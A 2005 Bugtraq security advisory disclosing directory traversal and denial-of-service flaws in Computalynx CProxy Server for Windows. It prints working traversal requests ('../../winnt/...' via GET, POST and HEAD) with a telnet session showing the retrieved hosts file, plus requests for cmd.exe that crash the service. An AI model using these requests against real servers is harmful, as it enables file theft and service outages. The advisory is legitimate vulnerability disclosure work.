Security Advisory: Computalynx CProxy Server Multiple Remote Vulnerabilities

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Security Advisory: Computalynx CProxy Server Multiple Remote Vulnerabilities
From: Kristof Philipsen <kristof.philipsen@xxxxxxxxxx>
Date: Wed, 02 Mar 2005 10:39:58 -0500
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
User-agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7) Gecko/20040616

+=========================================================================================+

| Security Advisory: Computalynx CProxy Server Multiple RemoteVulnerabilities |

+=========================================================================================+

|kristof.philipsen@xxxxxxxxxxMarch 02, 2005 |

+=========================================================================================+



AFFECTED PRODUCTS

Affected Software:

 - Computalynx CProxy 3.3.x for Win32
 - Computalynx CProxy 3.4.x (3.4.4 inclusive) for Win32

Possibly other software versions are affected.



IDENTIFIED ISSUES

The following issues were found to affect the aforementioned ComputalynxCProxy Server software:


 [1] Directory Traversal and Arbitrary File Access Attack
 [2] Denial-of-Service Attack



BRIEF DESCRIPTION

Computalynx CProxy is a Windows platform based proxy server featuringHTTP, Telnet, POP3, SMTP,FTP proxy functions, as well as Anti Virus and Content Filteringcapabilities. Because ofinadequate input validation, a malicious attacker can perform adirectory traversal attack andthus gain access to arbitrary files located on the CProxy Serversystem. Moreover, using thesame attack vector with especially crafted HTTP requests, it ispossible to crash the CProxy

service running on the remote system.



DETAILED DESCRIPTION

Computalynx CProxy Server is a multifunctional Windows platform basedproxy server with multi-protocol support. When performing proxy functions, CProxy Server isvulnerable to a directorytraversal attack. Inadequate input validation and input filteringallows a remote attacker togain attack to arbitrary files on the Windows system upon which theCProxy Server software hasbeen deployed. This first issue of directory traversal lies withinthe fact that the CProxyServer fails to filter out double dot attacks and in turn fails toprotect arbitrary filesfrom being requested and opened using the proxy service. Anespecially crafted URL allowsallows arbitrary files to be recovered from the system. Theretrieval of system files cancompromise the entire system or expose the system to further avenues ofattack. A maliciousattacker can perform a request using the following format to gain accessto arbitrary data:


GET http://<path-to-target-directory>/<filename> HTTP/1.0<CRLF><CRLF>

An attacker can gain access to a file in the WINNT directory as shown inthe following example,by connecting to CProxy Server's proxy service (listening on TCP port8080 by default), and

executing the following request:


  ronin[kris] ~ $ telnet 10.0.0.1 8080
  Trying 10.0.0.1...
  Connected to 10.0.0.1.
  Escape character is '^]'.
  GET http://../../../../../winnt/system32/drivers/etc/hosts HTTP/1.0

HTTP/1.0 200 OK

  Content-length: 734
  Date: Sat, 19 Feb 2005 21:09:58 GMT
  Date: Sat, 19 Feb 2005 21:09:58 GMT
  # Copyright (c) 1993-1999 Microsoft Corp.
  #
  # This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
  #
  # This file contains the mappings of IP addresses to host names. Each
  # entry should be kept on an individual line. The IP address should
  # be placed in the first column followed by the corresponding host name.
  # The IP address and the host name should be separated by at least one
  # space.
  #
  # Additionally, comments (such as these) may be inserted on individual
  # lines or following the machine name denoted by a '#' symbol.
  #
  # For example:
  #
  #      102.54.94.97     rhino.acme.com          # source server
  #       38.25.63.10     x.acme.com              # x client host

127.0.0.1 localhost

  Connection closed by foreign host.

In conjunction with this method, other HTTP methods such as "POST" and"HEAD", will also lead to

arbitrary file retrieval.

When retrieving an arbitrary ASCII file using the "GET" method, causesthe file to be displayedand immediately afterwards causes the CProxy Server service to crashwith an error messageindicating that "memory could not be read". However, when retrievingthis same ASCII file usingthe "POST" or "HEAD" methods will cause the file contents to bedisplayed and does not crash theCProxy Server service, allowing an attacker to execute multiplerequests and thus allowing

various arbitrary  files to be retrieved from the CProxy Server system.

 * The following request will cause the arbitrary file to be displayed:

-> "POST http://../../../../../winnt/system32/drivers/etc/hostsHTTP/1.0"

* The following request will cause the arbitrary file to be displayedand the CProxy Server

   service to crash:

   -> "GET http://../../../../../winnt/system32/drivers/etc/hosts HTTP/1.0"

When attempting to retrieve an executable file using any of these HTTPmethods ("GET","HEAD", or"POST"), in the aforementioned manner, will cause the contents of theexecutable file contentsto be displayed and the CProxy Server service to crash with an errormessage that "memory couldnot be read", rendering the service unavailable, thus resulting in aDenial-of-Service condition.

* Both of the following requests will cause the arbitrary executable'scontents to be displayed

   and the CProxy Server service to crash:

   -> "GET http://../../../../../winnt/system32/cmd.exe";
   -> "POST http://../../../../../winnt/system32/cmd.exe";



CHARACTERISTICS

* Inadequate input validation and filtering allows an attacker toperform directory traversal

 attacks against the systems running Computalynx CProxy Server.

* Different vectors of attack allow retrieval of arbitrary and possiblysensitive files from

 the system running Computalynx CProxy Server.

* Use of especially crafted URL's allow attackers to render to serviceunavailable, causing a

 Denial-of-Service condition.



SEVERITY

Each of these two issues affecting Computalynx CProxy Server softwarecan directly or indirectlyallow partial or complete compromise of the system and/or the datastored on the system running

the CProxy Server software.

Moreover, the second issue regarding a Denial-of-Service attackagainst the CProxy Serversoftware will directly affect any users depending on the availability ofthe functions which the

CProxy Software performs on this system.

Classification: MEDIUM to HIGH



VENDOR STATUS

19/Feb/2005 - Computalynx contacted regarding this issue.
02/Mar/2005 - At present, the vendor has not replied regarding this issue.



SOLUTION

* Currently awaiting vendor status for a solution regarding this issue.

* A mitigation strategy against attacks of this nature would be toensure that remote connectionsto the CProxy Server are not authorised (i.e. through the use ofproper firewall rules).




REFERENCES

[1] "Computalynx Software"
   - http://www.computalynx.com



--
Kristof Philipsen

Security Engineer

Ubizen - a Cybertrust company
18 rue Robert Stumper
L-2557 Luxembourg
Luxembourg
T:      +352 26 31 05 85
F:      +352 26 31 05 86
E-mail: kristof.philipsen@xxxxxxxxxx

www.ubizen.com - www.cybertrust.com

Prev by Date: Golden Ftp server 1.29 Username remote Buffer Overflow
Next by Date: Re: phpBB <= 2.0.12 UID Exploit
Previous by thread: Golden Ftp server 1.29 Username remote Buffer Overflow
Next by thread: iDEFENSE Labs Releases IDA Sync
Index(es):
- Date
- Thread